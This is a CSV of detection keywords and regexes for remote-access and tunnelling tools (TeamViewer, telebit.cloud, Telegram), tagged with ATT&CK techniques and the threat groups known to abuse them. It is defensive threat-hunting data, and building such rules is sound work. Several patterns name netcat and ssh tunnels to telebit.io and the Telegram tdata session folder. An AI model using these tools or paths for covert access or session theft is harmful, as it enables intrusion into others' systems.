"*\teamviewer_note.exe*",".{0,1000}\\teamviewer_note\.exe.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","0","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A"
"*\TeamViewerSession\shell\open*",".{0,1000}\\TeamViewerSession\\shell\\open.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","0","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A"
"*\TeamViewerTermsOfUseAccepted*",".{0,1000}\\TeamViewerTermsOfUseAccepted.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","0","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A"
"*\TV15Install.log*",".{0,1000}\\TV15Install\.log.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","0","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A"
"*\TVExtractTemp\TeamViewer_Resource_*",".{0,1000}\\TVExtractTemp\\TeamViewer_Resource_.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","0","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A"
"*\TVExtractTemp\tvfiles.7z*",".{0,1000}\\TVExtractTemp\\tvfiles\.7z.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","0","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A"
"*\TvGetVersion.dll*",".{0,1000}\\TvGetVersion\.dll.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","0","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A"
"*\TVNetwork.log*",".{0,1000}\\TVNetwork\.log.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","0","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A"
"*\TVWebRTC.dll*",".{0,1000}\\TVWebRTC\.dll.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","0","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A"
"*\Users\Public\Desktop\TVTest.tmp*",".{0,1000}\\Users\\Public\\Desktop\\TVTest\.tmp.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","0","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A"
"*\Windows\Temp\TeamViewer*",".{0,1000}\\Windows\\Temp\\TeamViewer.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","0","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A"
"*AppData\Local\Temp\TeamViewer*",".{0,1000}AppData\\Local\\Temp\\TeamViewer.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","0","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A"
"*AppData\Roaming\Microsoft\Windows\SendTo\TeamViewer.lnk*",".{0,1000}AppData\\Roaming\\Microsoft\\Windows\\SendTo\\TeamViewer\.lnk.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","0","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A"
"*client.teamviewer.com*",".{0,1000}client\.teamviewer\.com.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","1","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A"
"*download.teamviewer.com.cdn.cloudflare.net*",".{0,1000}download\.teamviewer\.com\.cdn\.cloudflare\.net.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","1","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A"
"*HKLM\SOFTWARE\TeamViewer*",".{0,1000}HKLM\\SOFTWARE\\TeamViewer.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","1","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A"
"*MRU\RemoteSupport\127.0.0.1.tvc*",".{0,1000}MRU\\RemoteSupport\\127\.0\.0\.1\.tvc.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","0","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A"
"*taf.teamviewer.com*",".{0,1000}taf\.teamviewer\.com.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","1","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A"
"*TeamViewer VPN Adapter*",".{0,1000}TeamViewer\sVPN\sAdapter.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","0","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A"
"*TEAMVIEWER.EXE-*.pf*",".{0,1000}TEAMVIEWER\.EXE\-.{0,1000}\.pf.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","0","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A"
"*TeamViewer\tv_w32.exe*",".{0,1000}TeamViewer\\tv_w32\.exe.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","0","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A"
"*TeamViewer\tv_x64.dll*",".{0,1000}TeamViewer\\tv_x64\.dll.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","0","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A"
"*TeamViewer\tv_x64.exe*",".{0,1000}TeamViewer\\tv_x64\.exe.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","0","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A"
"*TeamViewer\TVNetwork.log*",".{0,1000}TeamViewer\\TVNetwork\.log.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","0","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A"
"*TEAMVIEWER_.EXE-*.pf*",".{0,1000}TEAMVIEWER_\.EXE\-.{0,1000}\.pf.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","0","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A"
"*TeamViewer_Desktop.exe*",".{0,1000}TeamViewer_Desktop\.exe.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","1","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A"
"*TEAMVIEWER_DESKTOP.EXE-*.pf*",".{0,1000}TEAMVIEWER_DESKTOP\.EXE\-.{0,1000}\.pf.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","0","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A"
"*TeamViewer_Hooks.log*",".{0,1000}TeamViewer_Hooks\.log.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","0","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A"
"*TeamViewer_LogMutex*",".{0,1000}TeamViewer_LogMutex.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","0","#mutex","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A"
"*TeamViewer_Service.exe*",".{0,1000}TeamViewer_Service\.exe.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","0","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A"
"*TEAMVIEWER_SERVICE.EXE-*.pf*",".{0,1000}TEAMVIEWER_SERVICE\.EXE\-.{0,1000}\.pf.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","0","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A"
"*TeamViewer_Setup_x64.exe*",".{0,1000}TeamViewer_Setup_x64\.exe.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","1","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A"
"*TEAMVIEWER_SETUP_X64.EXE-*.pf*",".{0,1000}TEAMVIEWER_SETUP_X64\.EXE\-.{0,1000}\.pf.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","0","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A"
"*TeamViewer_VirtualDeviceDriver*",".{0,1000}TeamViewer_VirtualDeviceDriver.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","0","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A"
"*TeamViewer_XPSDriverFilter*",".{0,1000}TeamViewer_XPSDriverFilter.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","0","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A"
"*TeamViewer15_Logfile.log*",".{0,1000}TeamViewer15_Logfile\.log.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","0","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A"
"*TeamViewer3_Win32_Instance_Mutex*",".{0,1000}TeamViewer3_Win32_Instance_Mutex.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","0","#mutex","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A"
"*TeamViewerHooks_DynamicMemMutex*",".{0,1000}TeamViewerHooks_DynamicMemMutex.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","0","#mutex","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A"
"*TeamViewerMeetingAddIn.dll*",".{0,1000}TeamViewerMeetingAddIn\.dll.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","1","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A"
"*TeamViewerMeetingAddinShim.dll*",".{0,1000}TeamViewerMeetingAddinShim\.dll.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","1","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A"
"*TeamViewerMeetingAddinShim64.dll*",".{0,1000}TeamViewerMeetingAddinShim64\.dll.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","1","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A"
"*teamviewervpn.sys*",".{0,1000}teamviewervpn\.sys.{0,1000}","greyware_tool_keyword","teamviewer","TeamViewer Remote is software for remote assistance - control and access to computers and other terminals - abused by attackers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","LockBit -BianLian - Scattered Spider* - Trigona - Yanluowang","RMM","https://www.teamviewer.com/","1","0","N/A","FP risk - teamviewer usage","10","10","N/A","N/A","N/A","N/A"
"*.config/telebit/telebitd.yml*",".{0,1000}\.config\/telebit\/telebitd\.yml.{0,1000}","greyware_tool_keyword","telebit.cloud","Access your devices - Share your stuff (shell from telebit.cloud)","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://telebit.cloud/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/cloud.telebit.remote.plist*",".{0,1000}\/cloud\.telebit\.remote\.plist.{0,1000}","greyware_tool_keyword","telebit.cloud","Access your devices - Share your stuff (shell from telebit.cloud)","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://telebit.cloud/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/opt/telebit*",".{0,1000}\/opt\/telebit.{0,1000}","greyware_tool_keyword","telebit.cloud","Access your devices - Share your stuff (shell from telebit.cloud)","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://telebit.cloud/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/telebit http *",".{0,1000}\/telebit\shttp\s.{0,1000}","greyware_tool_keyword","telebit.cloud","Access your devices - Share your stuff (shell from telebit.cloud)","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://telebit.cloud/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/telebit.js.git*",".{0,1000}\/telebit\.js\.git.{0,1000}","greyware_tool_keyword","telebit.cloud","Access your devices - Share your stuff (shell from telebit.cloud)","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://telebit.cloud/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/telebit.service*",".{0,1000}\/telebit\.service.{0,1000}","greyware_tool_keyword","telebit.cloud","Access your devices - Share your stuff (shell from telebit.cloud)","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://telebit.cloud/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/telebit/var/log/*",".{0,1000}\/telebit\/var\/log\/.{0,1000}","greyware_tool_keyword","telebit.cloud","Access your devices - Share your stuff (shell from telebit.cloud)","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://telebit.cloud/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/telebit-remote.js*",".{0,1000}\/telebit\-remote\.js.{0,1000}","greyware_tool_keyword","telebit.cloud","Access your devices - Share your stuff (shell from telebit.cloud)","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://telebit.cloud/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*bin/telebit.js*",".{0,1000}bin\/telebit\.js.{0,1000}","greyware_tool_keyword","telebit.cloud","Access your devices - Share your stuff (shell from telebit.cloud)","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://telebit.cloud/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*cloud.telebit.remot*",".{0,1000}cloud\.telebit\.remot.{0,1000}","greyware_tool_keyword","telebit.cloud","Access your devices - Share your stuff (shell from telebit.cloud)","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://telebit.cloud/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*https://*.telebit.io*",".{0,1000}https\:\/\/.{0,1000}\.telebit\.io.{0,1000}","greyware_tool_keyword","telebit.cloud","Access your devices - Share your stuff (shell from telebit.cloud)","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://telebit.cloud/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*https://get.telebit.io*",".{0,1000}https\:\/\/get\.telebit\.io.{0,1000}","greyware_tool_keyword","telebit.cloud","Access your devices - Share your stuff (shell from telebit.cloud)","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://telebit.cloud/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*install -g telebit*",".{0,1000}install\s\-g\stelebit.{0,1000}","greyware_tool_keyword","telebit.cloud","Access your devices - Share your stuff (shell from telebit.cloud)","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://telebit.cloud/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*netcat *.telebit.io*",".{0,1000}netcat\s.{0,1000}\.telebit\.io.{0,1000}","greyware_tool_keyword","telebit.cloud","Access your devices - Share your stuff (shell from telebit.cloud)","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://telebit.cloud/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*ssh -o *.telebit.io*",".{0,1000}ssh\s\-o\s.{0,1000}\.telebit\.io.{0,1000}","greyware_tool_keyword","telebit.cloud","Access your devices - Share your stuff (shell from telebit.cloud)","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://telebit.cloud/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*ssh*.telebit.cloud*",".{0,1000}ssh.{0,1000}\.telebit\.cloud.{0,1000}","greyware_tool_keyword","telebit.cloud","Access your devices - Share your stuff (shell from telebit.cloud)","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://telebit.cloud/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*telebit ssh auto*",".{0,1000}telebit\sssh\sauto.{0,1000}","greyware_tool_keyword","telebit.cloud","Access your devices - Share your stuff (shell from telebit.cloud)","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://telebit.cloud/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*telebit tcp *",".{0,1000}telebit\stcp\s.{0,1000}","greyware_tool_keyword","telebit.cloud","Access your devices - Share your stuff (shell from telebit.cloud)","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://telebit.cloud/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*--user-unit=telebit*",".{0,1000}\-\-user\-unit\=telebit.{0,1000}","greyware_tool_keyword","telebit.cloud","Access your devices - Share your stuff (shell from telebit.cloud)","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://telebit.cloud/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\AppData\Roaming\Telegram Desktop\tdata*",".{0,1000}\\AppData\\Roaming\\Telegram\sDesktop\\tdata.{0,1000}","greyware_tool_keyword","telegram","telegram API usage -given the increasing adoption of Telegram by malware for command and control (C2) operations. it's essential to monitor and restrict its usage within corporate networks and on company devices","T1071.004 - T1102 - T1047","TA0011 - TA0002 - TA0005","N/A","N/A","C2","api.telegram.org","0","1","N/A","High False positive Risk !","1","9","N/A","N/A","N/A","N/A"
